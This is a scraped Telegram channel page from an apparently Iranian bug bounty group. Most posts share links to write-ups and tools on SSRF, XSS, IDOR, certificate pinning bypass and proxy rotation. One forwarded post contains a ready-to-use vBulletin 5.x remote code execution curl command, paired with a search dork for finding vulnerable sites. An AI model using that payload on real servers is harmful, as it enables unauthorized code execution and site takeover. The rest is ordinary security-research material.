Web_Priv8
@web_priv8
762 subscribers
405 photos
24 videos
45 files
588 links
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98

Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Download Telegram
About
Blog
Apps
Platform
Join
Web_Priv8
762 subscribers
Web_Priv8
How to bypass Android certificate pinning and intercept SSL traffic

https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/

#Android
#SSL

@web_priv8
Kamil Vavra @vavkamil
How to bypass Android certificate pinning and intercept SSL traffic
Offensive website security Bug bounty Ethical hacking
467 viewsr00t98
Web_Priv8
آسیب پذیری RCE بر روی روترهای مبین نت

بخش انگلیسی:
https://link.medium.com/2QQKzATVM8

بخش فارسی:
https://vrgl.ir/3gZtC


#RCE

@web_priv8
675 viewsr00t98, edited  
Web_Priv8
Forwarded from امنیت اطلاعات
Subdomains discover + HTTP check + content type/content size/response code + website title + IP + CNAME records + Screenshots of subdomain websites

https://github.com/Edu4rdSHL/findomain

https://asciinema.org/a/352218


#subdomain
#pentest
#bugbounty


@sec_nerd
GitHub
GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…
The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...
372 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
Reflected XSS in Facebook’s mirror websites


https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11


#writeup
#xss

@sec_nerd
370 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
#postgres
#backdoor

@sec_nerd
457 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
0day RCE exploit on vBulletin 5xx

dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'

#vbulletin
#rce
#pentest
#web

@sec_nerd
411 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
https://gist.github.com/Mad-robot/58f0d5fad92566a3a8766d5ecaf8f19b


#shodan
#vbulletin


@sec_nerd
447 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
کشف باگ SSRF در وبسایت imgur

https://hackerone.com/reports/247680


#bugbounty
#ssrf
#pentest


@sec_nerd
398 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
همه چیز در خصوص SSRF

https://medium.com/swlh/intro-to-ssrf-beb35857771f

https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437

https://medium.com/swlh/ssrf-in-the-wild-e2c598900434

https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b


#ssrf
#bugbounty
#pentest
#web


@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.
444 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
راهکارهایی برای دور زدن Rate Limit



#bugbounty
#pentest


@sec_nerd
360 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ

از سال ۲۰۱۲ تا ۲۰۲۰


https://pentester.land/list-of-bug-bounty-writeups.html


#pentest
#bugbounty


@sec_nerd
417 viewsr00t98
Web_Priv8
RACE Condition vulnerability found in bug-bounty program

https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43

#RC

@web_priv8
Medium
RACE Condition vulnerability found in bug-bounty program
I have recently identified RACE condition vulnerability in Bug bounty program.
662 viewsr00t98, edited  
Web_Priv8
Forwarded from ناویا، ماشین کاوش اپلای
به تعداد راه‌های رسیدن به خدا، راه دور زدن مکانیزم‌های امنیتی هم هست.

توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راه‌هایی رو پیدا کنه که می‌شه ازش در دور زدن مکانیزم‌های امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
542 viewsr00t98
Web_Priv8
JSON Hijacking, SOP Bypass Technic with Cache-Control

https://www.hahwul.com/2020/01/12/json-hijacking-sop-bypass-technic-with-cache/

https://hackerone.com/reports/761726

#SOP
#CORS
#Bypass

@web_priv8
573 viewsr00t98, edited  
Web_Priv8
Brute force directory & file to RCE

https://twitter.com/r00t98/status/1299449105350090753

#RCE
#BugBounty
#BugBountyTip

@web_priv8
805 viewsr00t98, edited  
Web_Priv8
https://twitter.com/Ravro_ir/status/1300460238752092161

@web_priv8
X (formerly Twitter)
Ravro on X
راورو با همکاری @RavinAcademy برگزار می‌کند:
پنج‌شنبه شب، ۱۳ شهریور،
از ساعت ۲۱، به صورت زنده و رایگان شکار آسیب‌پذیری توسط «سینا دوستی»
را بر روی twitch تماشا کنید.

برای کسب اطلاعات بیشتر درباره‌ی پخش زنده‌ی شکار آسیب‌پذیری، به لینک زیر مراجعه کنید:
h…
1.26K viewsr00t98
Web_Priv8
How to Create Unlimited Rotating IP Addresses with AWS

https://medium.com/@devinjaystokes/using-proxycannon-ng-to-create-unlimited-rotating-proxies-fccffa70a728

#AWS
#Cloud

@web_priv8
705 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
اینجا یاد میگیرید چطور FUFF و burpsuite رو با هم ترکیب کنید

https://medium.com/@santosomar/a-quick-guide-to-using-ffuf-with-burp-suite-713492f62242


#fuff
#fuzz
#burpsuite

@sec_nerd
375 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
This media is not supported in your browser
VIEW IN TELEGRAM
کشف آسیب پذیری RCE در پیام رسان cisco jabber


https://watchcom.no/nyheter/nyhetsarkiv/uncovers-cisco-jabber-vulnerabilities/



این مطلب رو بخونید تا ببینید چطور یک آسیب پذیری XSS به اجرای دستور ختم میشه


#rce
#cisco
#xss


@sec_nerd
367 viewsr00t98
Web_Priv8
Forwarded from امنیت اطلاعات
نکات کاربردی در خصوص حملات IDOR

https://www.notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b


#idor
#bugbounty
#web

@sec_nerd
rural-tune-378 on Notion
IDOR: Attack vectors, exploitation, bypasses and chains | Notion
API12019: Testing for IDOR/Broken object level authorization:
404 viewsr00t98
Web_Priv8
Full security assessment for iOS applications

#ios
#BugBounty
#BugBountyTip

@web_priv8
462 viewsr00t98, edited